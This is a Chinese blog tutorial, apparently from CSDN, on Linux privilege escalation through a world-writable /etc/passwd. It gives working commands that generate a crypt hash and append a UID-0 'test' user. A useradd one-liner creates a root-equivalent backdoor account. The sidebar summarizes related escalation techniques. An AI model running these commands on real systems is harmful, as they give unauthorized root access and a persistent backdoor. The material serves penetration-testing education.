Linux提权之利用 /etc/passwd 文件

最新推荐文章于 2024-06-22 08:00:00 发布
最新推荐文章于 2024-06-22 08:00:00 发布
阅读量5.6k 收藏 14
点赞数 3
分类专栏: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/99871667
版权

当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行提权,以执行更多的操作。

接下来我们的提权是利用 /etc/passwd 文件的可写入权限,导致我们写入一个其他用户进去。

首先,查看 /etc/passwd 的权限,发现任何用户都可以读写。

有关于 /etc/passwd 文件里面数据的每个属性,传送门——> Linux下的用户和组

我们现在要做的就是自己构造一个用户,在密码占位符处指定密码,并且UID设置为0,将其添加到 /etc/passwd 文件中。

首先,使用perl语言生成带有盐值的密码:

perl -le 'print crypt("password@123","addedsalt")'

然后执行下面这条命令,成功将test用户的信息加入 /etc/passwd 文件

echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

以用户名:test  密码: password@123 登录主机,登录成功后,是 root 权限。

以下这条命令直接生成一个具有root权限的用户:venus,密码为:123qwe 。前提是这条命令的执行需要root权限。

useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus

 

谢公子
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
提权方法:利用系统命令修改环境变量路径劫持提权
墨痕诉清风的博客
09-03 1942
可以看到/usr/bin/status 非系统常见 但是这个status让我们可以联想到经常使用的service命令 service ssh status 查看ssh工具状态 利用这个特性,我们创建service文件,使他调用我们的status
Linux 系统--组管理(创建,修改,删除),用户提权操作
GaoShi66的博客
08-20 689
Linux系统中的组用户管理,组的删除,创建,修改以及高级使用方法,普通用户执行管理员权限进行用户创建等等
tron-passwd写入提权
最新发布
书山有路勤为径,学海无涯苦作舟
06-22 309
由substitute单词翻译是代替可以知道,这是简单的替换密码。替换格式也表明了明文(plaintext)密文(ciphertext),就是把26字母倒叙替换,很容易写脚本。下载知名豌豆扫描工具linpeas发现passwd 有写入权限,那么我们可以直接写入一个root权限的用户或者更改他的账号密码。一长串的进行base64解码。再进行brainfuck解码得到。猜测账户就是player。
ansible控制主机和受控主机之间免密及提权案例
wjs_6667的博客
08-02 1561
node2机子一样的设置,只需要给%wheel添加一个NOPASSWD,这个%代表组的意思,就是添加在组里面,这个组都可以访问,不需要密码。为了确保在ansible执行中,各个主机不会受到这些限制,我们可以提供密钥保存到各个主机上,以实现免密登陆效果。是一个用于生成SSH密钥对的命令行工具。是一个方便的工具,用于将本地计算机上的公钥复制到远程服务器的授权密钥列表中,以实现无密码的SSH登录。是一个方便的工具,用于将本地计算机上的公钥复制到远程服务器的授权密钥列表中,以实现无密码的SSH登录。
linux提权——passwd提权
tomyyyyy
04-14 3355
通过修改/etc/passwd提升权限 基础知识 /etc/passwd: 文件中的详细信息格式 用户名:代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(????,因为冒号在这里是分隔符。为了兼容起见,登录名中最好不要包含点字符(.),并且不使用连字符(-)和加号(+)打头。 口令:一些系统中,存放着加密后的用户口令字。虽然这个字段存放的只...
linux提权~利用 /etc/passwd 文件
@小张小张的博客
09-27 5960
linux提权~利用 /etc/passwd 文件提权利用 /etc/passwd 文件的可写入权限,我们可以写入一个其他用户进去。 1.查看 /etc/passwd 的权限 首先,查看 /etc/passwd 的权限,发现任何用户都可以执行读写权限。 命令: ls -lh /etc/passwd 文件权限的查看 使用 ls -lh 可以查看文件的具体信息,其中包括不同的用户对该文件的权限 (字符每3个一组(rwx),读(r)、写(w)、执行(x)) 2.记录行的基本属性 Lin
Linux利用脏牛漏洞提权
cxrpty的博客
03-10 5801
实验环境:Centos6.5、ssh、 实验步骤: 一、搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...
Linux提权—/etc/passwd
qq_40898302的博客
04-11 3484
linxu提权
Linux 提权passwd
SHELLCODE_8BIT的博客
04-21 205
Linux提权passwd,shadow_mrx56的博客-CSDN博客
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1394
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
day01 提权
Karka_的博客
08-10 169
一句话概括,在 Linux 中,我们进行权限提升的最终目标是获得一个以 root 用户身份运行的 shell。环境靶机 :Linux Debian攻击机:kali Linux从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
linux提权——提权大赏
qq_55202378的博客
04-20 1004
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
账号安全控制之用户切换与提权(二)
08-27 176
1.su命令——切换用户限制su命令切换root用户的权限首先修该/etc/pas.m/su配置文件,启用pam_wheel认证 实现个别用户切换,将授权使用su命令的用户怎加到wheel组命令:gpasswd -a 用户名 wheel 验证: sudo提权1.在配置文件/etc/sudoers中增加授权,使用visudo工具进行编辑。2.授权记录的基本格式如下user MACCHINE=COM...
Linux用户的基本操作3 (组的基本管理,用户提权
andy09_2014的博客
06-30 297
目录 组的基本原理 用户身份切换 5.用户身份提权 组的基本原理 组账户信息保存在/etc/group 和/etc/gshadow 两个文件中. /etc/group组账户信息 [root@zls ~]# head -2 /etc/group root:x:0: bin:x...
su切换用户和sudo用户提权
liuxe1990的博客
06-04 5385
su切换的基本用法: Substitute User,切换用户 快速切换为指定的其他用户 普通用户执行时,需要验证目标用户的口令 root执行时,无需验证口令 命令格式 用法一:su [-] 目标用户 用法二:su [-] -c “命令” 目标用户 su和su -的区别: su:只是切换成了目标用户,shell环境仍然为root的shell,通过pwd可以查看切换用户后的工作目录 su ...
用户切换与提权
08-27 118
Linux服务器在实际操作中并不建议直接使用root进行登录,因为root的权限最高,一旦失误造成的破坏也是巨大的,因此我们还要限制别的用户随意切换到root用户。因此我们要为普通用户提供一种身份切换或权限提升机制,以便必要的工作时的需要。这里Linux系统为我们提供了su与sudo两种命令。1、su命令在未进行设置之前我们每个用户再知道所要切换的对象的密码时都可以自由切换。 但是这样的话所有用户...
用户如何提权
cmdd_的博客
07-31 1084
文章目录1. 用户提权概述2. 用户的工作环境相关文件3. su命令切换用户4. sudo用户提权5. sudo设置组6. sudo设置案例 1. 用户提权概述 1. su 使用普通用户登录,然后执行su命令切换到root用户 优点:简单 缺点:需要知道root密码 2. sudo 使用普通用户管理,当需要使用root的权限的时候,进行提权 优点:安全、方便 缺点:复杂 shell的分类及执行的过程 交互式shell #终端操作 输入一条指令,需要等待系统的
三步提权
底层社会中的弱智
02-27 254
 先创建一个t1用户 net user 名字 密码 /add net user test 123 /add 添加到管理组 net localgroup Administrators t1 /add net localgroup Administrators    
Linux系统基础:/etc/passwd文件详解
本文将深入探讨Linux系统中的一个重要文件——`/etc/passwd`,以及Linux系统的基础知识,包括其起源、特点、选择Linux的原因,以及Red Hat Linux的相关内容。此外,我们还将介绍Linux用户环境的基本操作,如本地登录...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值